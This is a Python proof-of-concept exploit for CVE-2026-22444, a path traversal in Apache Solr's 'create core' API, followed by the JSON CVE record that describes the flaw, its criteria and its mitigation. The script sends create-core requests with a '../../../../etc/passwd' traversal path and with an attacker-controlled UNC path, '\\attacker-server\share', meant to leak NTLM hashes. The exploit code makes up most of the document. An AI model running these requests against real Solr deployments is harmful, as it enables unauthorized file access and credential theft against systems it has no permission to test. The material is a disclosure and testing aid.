CVE-2026-22444

import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # CVE-2026-22444 PoC - Apache Solr Path Traversal in create core API # Target: Apache Solr 8.6 - 9.10.0 TARGET = "http://target-solr:8983" def create_core_with_path_traversal(): """ Create a core using path traversal to bypass allowPaths restriction """ # Construct path traversal payload to access restricted paths # Using ../ to traverse outside allowed directories malicious_configset = "../../../../etc/passwd" url = f"{TARGET}/solr/admin/cores" params = { "action": "CREATE", "name": "malicious_core", "instanceDir": malicious_configset, "configSet": malicious_configset, "collection": "malicious_collection", "numShards": 1 } try: response = requests.get(url, params=params, verify=False, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("[+] Core creation request sent - check for path traversal success") else: print("[-] Request failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def check_ntlm_hash_leak_unc(): """ Windows UNC path trigger for NTLM hash leak """ url = f"{TARGET}/solr/admin/cores" # Attacker controlled UNC path to capture NTLM hash unc_path = "\\\\attacker-server\\share\\configset" params = { "action": "CREATE", "name": "unc_core", "instanceDir": unc_path, "configSet": unc_path } try: response = requests.get(url, params=params, verify=False, timeout=10) print(f"[+] UNC path request sent to trigger NTLM auth") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("=== CVE-2026-22444 PoC ===") create_core_with_path_traversal() print("\n=== NTLM Hash Leak Test (Windows) ===") check_ntlm_hash_leak_unc()

{"cve": {"id": "CVE-2026-22444", "sourceIdentifier": "[email protected]", "published": "2026-01-21T14:16:06.707", "lastModified": "2026-01-27T20:30:40.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The \"create core\" API of Apache Solr 8.6 through 9.10.0 lacks sufficient input validation on some API parameters, which can cause Solr to check the existence of and attempt to read file-system paths that should be disallowed by Solr's \"allowPaths\" security setting https://https://solr.apache.org/guide/solr/latest/configuration-guide/configuring-solr-xml.html#the-solr-element .  These read-only accesses can allow users to create cores using unexpected configsets if any are accessible via the filesystem.  On Windows systems configured to allow UNC paths this can additionally cause disclosure of NTLM \"user\" hashes. \n\nSolr deployments are subject to this vulnerability if they meet the following criteria:\n * Solr is running in its \"standalone\" mode.\n * Solr's \"allowPath\" setting is being used to restrict file access to certain directories.\n * Solr's \"create core\" API is exposed and accessible to untrusted users.  This can happen if Solr's RuleBasedAuthorizationPlugin https://solr.apache.org/guide/solr/latest/deployment-guide/rule-based-authorization-plugin.html is disabled, or if it is enabled but the \"core-admin-edit\" predefined permission (or an equivalent custom permission) is given to low-trust (i.e. non-admin) user roles.\n\nUsers can mitigate this by enabling Solr's RuleBasedAuthorizationPlugin (if disabled) and configuring a permission-list that prevents untrusted users from creating new Solr cores.  Users should also upgrade to Apache Solr 9.10.1 or greater, which contain fixes for this issue."}, {"lang": "es", "value": "La API 'create core' de Apache Solr 8.6 hasta 9.10.0 carece de suficiente validación de entrada en algunos parámetros de la API, lo que puede hacer que Solr compruebe la existencia e intente leer rutas del sistema de archivos que deberían ser denegadas por la configuración de seguridad 'allowPaths' de Solr https://https://solr.apache.org/guide/solr/latest/configuration-guide/configuring-solr-xml.html#the-solr-element . Estos accesos de solo lectura pueden permitir a los usuarios crear núcleos utilizando conjuntos de configuración (configsets) inesperados si alguno es accesible a través del sistema de archivos. En sistemas Windows configurados para permitir rutas UNC, esto puede causar adicionalmente la divulgación de hashes NTLM de 'usuario'.\n\nLas implementaciones de Solr están sujetas a esta vulnerabilidad si cumplen los siguientes criterios:\n * Solr se está ejecutando en su modo 'standalone'.\n * La configuración 'allowPath' de Solr se está utilizando para restringir el acceso a archivos a ciertos directorios.\n * La API 'create core' de Solr está expuesta y es accesible para usuarios no confiables. Esto puede ocurrir si el RuleBasedAuthorizationPlugin de Solr https://solr.apache.org/guide/solr/latest/deployment-guide/rule-based-authorization-plugin.html está deshabilitado, o si está habilitado pero el permiso predefinido 'core-admin-edit' (o un permiso personalizado equivalente) se otorga a roles de usuario de baja confianza (es decir, no administradores).\n\nLos usuarios pueden mitigar esto habilitando el RuleBasedAuthorizationPlugin de Solr (si está deshabilitado) y configurando una lista de permisos que impida a los usuarios no confiables crear nuevos núcleos de Solr. Los usuarios también deberían actualizar a Apache Solr 9.10.1 o superior, que contienen correcciones para este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0", "versionEndExcluding": "9.10.1", "matchCriteriaId": "8EEA3BEF-03F1-4D74-A368-95EDEAA65966"}]}]}], "references": [{"url": "https://lists.apache.org/thread/qkrb9dd4xrlqmmq73lrhkbfkttto2d1m", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/20/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}